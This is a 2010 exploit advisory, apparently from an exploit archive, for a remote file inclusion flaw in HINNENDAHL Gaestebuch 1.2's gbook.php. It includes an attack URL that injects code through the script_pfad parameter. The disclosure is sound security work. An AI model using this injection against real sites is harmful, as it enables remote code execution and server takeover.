id: 13871
date: 08/26/2010
title: Gaestebuch 1.2 Remote File Inclusion Vulnerability
author: bd0rk
cves: 

==================================================
Gaestebuch 1.2 Remote File Inclusion Vulnerability
==================================================

[~] Affected-Software: HINNENDAHL.COM Gaestebuch 1.2
 
[~] Vendor: http://www.hinnendahl.com/
 
[~] Download: http://www.hinnendahl.com/index.php?seite=download
 
[*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s
 
 
Description: The $script_pfad parameter in /guestbook/gbook.php
             isn't declared before require. So an attacker can execute some
             php-shellcode about it. (line 3 - 4)
 
 
 
[+]Exploit: http://www.example.com/guestbook/gbook.php?script_pfad=[SHELLCODE]
 
 
 
### The 21 years old, german Hacker bd0rk ### <---white-hat :-)



#  0day.today [2023-03-22]  #